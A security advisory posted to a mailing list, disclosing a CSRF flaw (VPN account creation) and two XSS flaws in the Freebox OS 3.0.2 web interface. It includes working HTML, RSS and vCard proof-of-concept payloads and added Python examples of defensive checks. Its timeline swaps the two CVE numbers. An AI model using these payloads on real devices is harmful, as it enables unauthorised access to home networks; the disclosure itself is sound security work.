Hello list,
Here are two CVEs I reported to Freebox, a French ISP:
- CVE-2014-9382 - CSRF in VPN user account creation
- CVE-2014-9405 - XSS
Vulnerable product: Freebox OS Web interface 3.0.2.
CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation
====================
Risk level: High
Freebox allows users to create VPN connections to their home network.
In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:
{"login":"foo","password_set":false,"ip_reservation":"","password":"bar"}
This request is vulnerable to CSRF, which is easy to trigger.
The following POC would create a new VPN account "ngocdh" / "1234=5678":
<html>
<body onload=vpn.submit()>
<form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">
<input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&quot;password_set&quot;:false,&quot;ip_reservation&quot;:&quot;&quot;,&quot;password&quot;:&quot;1234" value="5678&quot;}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
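The PoC above works because a form with enctype="text/plain" sends its single hidden field as name=value, which assembles into a valid JSON body, and the endpoint accepts that body without checking how it was produced. The following is an added example (not Freebox's code) that reproduces the body the browser sends and shows a server-side check that rejects it; the header dictionaries and the attacker origin are constructed for the demonstration.

```python
import json
from urllib.parse import urlparse

# Host of the Freebox OS web interface, as named in the advisory.
TRUSTED_ORIGIN = "http://mafreebox.free.fr"


def text_plain_form_body(name: str, value: str) -> str:
    """Body a browser sends for one <input> in a form with enctype="text/plain":
    field name, '=', field value, CRLF, with no percent-encoding at all.
    That is how the PoC turns a cross-site form post into a JSON document."""
    return f"{name}={value}\r\n"


def parse_vpn_user_request(body: str) -> dict:
    """What the unfixed /api/v3/vpn/user/ handler effectively does: treat the
    body as JSON no matter which Content-Type or origin it arrived with."""
    return json.loads(body)


def is_same_origin_json_request(headers: dict) -> bool:
    """Defensive check added here (assumption, not the vendor's fix): accept the
    state-changing call only when
      1. the body is declared application/json, a type an HTML form cannot set
         (forms are limited to urlencoded, multipart and text/plain), and
      2. the Origin header (or Referer as a fallback) names the box itself.
    A per-session CSRF token is the usual complement to these two checks."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    parsed = urlparse(origin)
    return f"{parsed.scheme}://{parsed.netloc}" == TRUSTED_ORIGIN


# Constructed headers: what the PoC page sends versus a legitimate UI call.
POC_HEADERS = {"Content-Type": "text/plain", "Origin": "http://attacker.example"}
LEGIT_HEADERS = {"Content-Type": "application/json", "Origin": TRUSTED_ORIGIN}

# The hidden input's name and value from the PoC, after HTML entity decoding.
POC_BODY = text_plain_form_body(
    '{"login":"ngocdh","password_set":false,"ip_reservation":"","password":"1234',
    '5678"}',
)

if __name__ == "__main__":
    print(parse_vpn_user_request(POC_BODY))          # password is "1234=5678"
    print(is_same_origin_json_request(POC_HEADERS))  # False: rejected
    print(is_same_origin_json_request(LEGIT_HEADERS))  # True: accepted
```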
CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
====================
Risk level: low
Two XSS instances with low probability of exploitation were found in the following places:
- Download RSS
- Contacts
The following POC demonstrates the XSS in the "description" field of a Download RSS item:
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>From Huy Ngoc</title>
<description>huyngocbk@gmail.com</description>
<link>http://google.com</link>
<atom:link rel="hub" href="http://google.com"/>
<atom:link rel="self" href="http://google.com"/>
<item>
<title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>
<pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>
<guid>http://google.com></guid>
</item>
</channel>
</rss>
In order to exploit this XSS, the attacker must control an RSS feed to which a user has subscribed.
The following VCF file demonstrates an XSS exploitation POC: "alert(document.domain)" is called after importing this VCF file from the web interface:
BEGIN:VCARD
VERSION:3.0
FN:DAU Huy Ngoc
N:;;;;
URL:<img src=/ onerror='alert(document.domain);'>
END:VCARD
In order to exploit this XSS, the attacker must trick a user into importing the malicious .vcf.
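Both XSS instances have the same root cause: a string taken from an untrusted file (the RSS item's description, the vCard's URL property) is placed into the page as markup. The following added example (not the Freebox interface's code) parses reduced copies of the two PoC files, shows that the parsed fields hold raw HTML, and renders them with output encoding and a URL scheme check so the payloads stay inert; the sample feed and vCard are constructed from the PoCs and the vCard reader is a minimal one that ignores line folding.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed inputs: the PoC RSS item and PoC vCard, reduced to the relevant fields.
RSS_SAMPLE = """<rss version="2.0"><channel><item>
<title>Test by huyngoc</title>
<description><![CDATA[<img src=/ onerror="alert(document.domain)">]]></description>
</item></channel></rss>"""

VCF_SAMPLE = ("BEGIN:VCARD\r\nVERSION:3.0\r\nFN:DAU Huy Ngoc\r\nN:;;;;\r\n"
              "URL:<img src=/ onerror='alert(document.domain);'>\r\nEND:VCARD\r\n")


def rss_item_descriptions(feed_xml: str) -> list:
    """The XML parser unwraps CDATA, so each description comes back as raw HTML
    text; whether it is harmless depends entirely on how it is rendered."""
    root = ET.fromstring(feed_xml)
    return [(item.findtext("description") or "") for item in root.iter("item")]


def vcard_urls(vcf: str) -> list:
    """Minimal vCard 3.0 reader for URL properties (assumes no folded lines)."""
    urls = []
    for line in vcf.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.split(";")[0].upper() == "URL":
            urls.append(value)
    return urls


def render_description(desc: str) -> str:
    """Safe rendering: feed-supplied description is shown as text, not markup."""
    return f"<p>{html.escape(desc, quote=True)}</p>"


def render_contact_url(url: str) -> str:
    """Safe rendering: only an http(s) URL with a host becomes a link, and the
    value is entity-escaped in both attribute and text position."""
    parsed = urlparse(url)
    safe = html.escape(url, quote=True)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return f"<span>{safe}</span>"
    return f'<a href="{safe}">{safe}</a>'


if __name__ == "__main__":
    for desc in rss_item_descriptions(RSS_SAMPLE):
        print(render_description(desc))
    for url in vcard_urls(VCF_SAMPLE):
        print(render_contact_url(url))
```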
Timeline:
21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)
Credit: DAU Huy Ngoc (@ngocdh)